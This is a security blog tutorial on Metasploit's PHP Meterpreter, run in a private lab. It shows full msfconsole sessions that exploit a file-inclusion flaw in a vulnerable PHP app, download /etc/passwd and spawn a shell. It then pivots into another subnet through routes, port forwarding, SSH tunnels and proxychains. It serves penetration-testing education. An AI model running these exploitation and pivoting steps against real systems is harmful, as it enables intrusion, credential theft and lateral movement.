David Robert's -castlebbs- Blog

Only two months after version 3.4.0 of the framework, version 3.4.1 is released with an important number of new features.

Among the new features, I found this one really interesting:

• PHP Meterpreter - A protocol-compatible port of the original Meterpreter payload to PHP. This new payload adds the ability to pivot through webservers regardless of the native operating system

The meterpreter is an advanced post exploitation system and is one of the best functions within metasploit. If you don't know what it is, I recommend you to have a look at the below:

• http://www.carnal0wnage.com/research/ChiCon07_Gates_Metasploit-Day2-FunStuff.pdf
• http://www.metasploit.com/documents/meterpreter.pdf

Below is an example on how to launch a meterpreter session exploiting a Remote File Inclusion vulnerability in a php application. For the purpose of this test, I used the vulnerable version of Autonomous LAN party:

• My "metasploit server" is on 192.168.142.129
• The "vulnerable linux server" hosting the vulnerable web application is on 192.168.142.128, it is also connected to another subnet: 192.168.204.0/24 not accessible by the Metasploit server
• There is a windows "server" on the other subnet: 192.168.204.12

               _                  _       _ _
               | |                | |     (_) |
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___  _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
                            | |
                            |_|

       =[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 570 exploits - 285 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
       =[ svn r9925 updated yesterday (2010.07.25)

msf > use unix/webapp/php_include
msf exploit(php_include) > set RHOST 192.168.142.128
RHOST => 192.168.142.128
msf exploit(php_include) > set SRVHOST 192.168.142.129
SRVHOST => 192.168.142.129
msf exploit(php_include) > set PHPURI /alp/include/_bot.php?master[currentskin]=XXpathXX
PHPURI => /alp/include/_bot.php?master[currentskin]=XXpathXX
msf exploit(php_include) > set PAYLOAD php/meterpreter/bind_tcp
PAYLOAD => php/meterpreter/bind_tcp

We used the unix/webapp/php_include generic exploit with the php/meterpreter/bind_tcp payload, and then we run it:

msf exploit(php_include) > exploit
[*] Started bind handler

[*] Using URL: http://192.168.142.129:8080/Po9G2hcnGmH
[*] PHP include server started.
[*] Sending stage (35521 bytes) to 192.168.142.128
[*] Meterpreter session 1 opened (192.168.142.129:40032 -> 192.168.142.128:4444) at 2010-07-27 00:12:04 +0100

meterpreter >

We now have a meterpreter session, here are examples of commands that are supported by the PHP meterpreter:

meterpreter > sysinfo
Computer: castlebbs-vulnerable
OS      : Linux castlebbs-vulnerable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
meterpreter > cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       castlebbs-vulnerables.localdomain       castlebbs-vulnerable
192.168.204.12  windows-server.localdomain  windows-server
meterpreter > download /etc/passwd /tmp/pass
[*] downloading: /etc/passwd -> /tmp/pass
[*] downloaded : /etc/passwd -> /tmp/pass//etc/passwd

We can obtain a shell:

meterpreter > execute -i -f /bin/bash
Process 5487 created.
Channel 5 created.
ps
  PID TTY          TIME CMD
 5485 ?        00:00:00 apache2
 5486 ?        00:00:01 apache2
 6175 ?        00:00:00 sh
 6176 ?        00:00:00 bash
 6177 ?        00:00:00 ps
whoami
www-data

Meterpreter for windows system includes much more functions that don't make sense in the context of a php exploitation (eg. DLL injection, migration etc.). But the real good thing with the php meterpreter is that it has a fully functional support for port forwarding and enable also the creation of new routes. For instance, having exploited a RFI on our web application, we can pivot through the webserver and pen-test the windows server on the other subnet still from our Metasploit server.

First, let's have a look at the capability of adding a new route:

msf exploit(php_include) > sessions -l

Active sessions
===============

  Id  Type         Information                           Connection
  --  ----         -----------                           ----------
  1   meterpreter  www-data (33) @ castlebbs-vulnerable  192.168.142.129:40032 -> 192.168.142.128:4444

msf exploit(php_include) > route add 192.168.204.0 255.255.255.0 1
msf exploit(php_include) > route print

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.204.0      255.255.255.0      Session 1

It needs to be understood at this stage that this route is not added in the operating system routing table, but on the framework itself. It means that most of the auxiliary modules and the exploits will work directly and the network traffic will be routed through the meterpreter. Below is an example of using the scanner/smb/smb_version on the routed host:

msf > use scanner/smb/smb_version
msf auxiliary(smb_version) > set RHOSTS 192.168.204.12
RHOSTS => 192.168.204.12
msf auxiliary(smb_version) > run

[*] 192.168.204.12 is running Windows XP Service Pack 2 (language: French) (name:CASTLEBBS) (domain:WORKGROUP)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Then let's have a look at the port forwarding capability. While the routing capability of metasploit is nice, as said previously, it is not a route defined at the operating system level on the metasploit server. It means that no software except metasploit can access the routed host directly. The command below will forward the local port 222 (on the metasploit server) to the remote port 22 of the vulnerable linux server.

meterpreter > portfwd add -L 127.0.0.1 -l 222 -r 192.168.142.128 -p 22
[*] Local TCP relay created: 127.0.0.1:222 <-> 192.168.142.128:22

Because we didn't upload a custom ssh server, we need to know the credentials to login or (or let's say scanner/ssh/ssh_login was successful). Launching this command:

ssh -p 222 localhost -l user

Will actually open a ssh session on the vulnerable linux server, this is the port forwarding. But there is better now, we can use the ssh port forwarding options to access directly the ports from the windows server. Example below, local port 445 is forwarded to port 445 on the windows server therefore smb tools can be launched locally.

ssh -L 445:192.168.204.12:445 -p 222 user@localhost

And to have the bread and the butter, we can you the ssh dynamic port option (-D please see man ssh) with proxychains on the metasploit host, so all traffic is redirected to the vulnerable linux server acting as a socks proxy enabling full access to the subnet(s) connected to

Proxychains configuration (by default)
[ProxyList]
socks4  127.0.0.1 9050

# ssh -D 9050  -p 222 user@localhost
# proxychains nmap -sV 192.168.204.12
# proxychains msfconsole # haha this even worked - but maybe not very useful since metasploit has the route option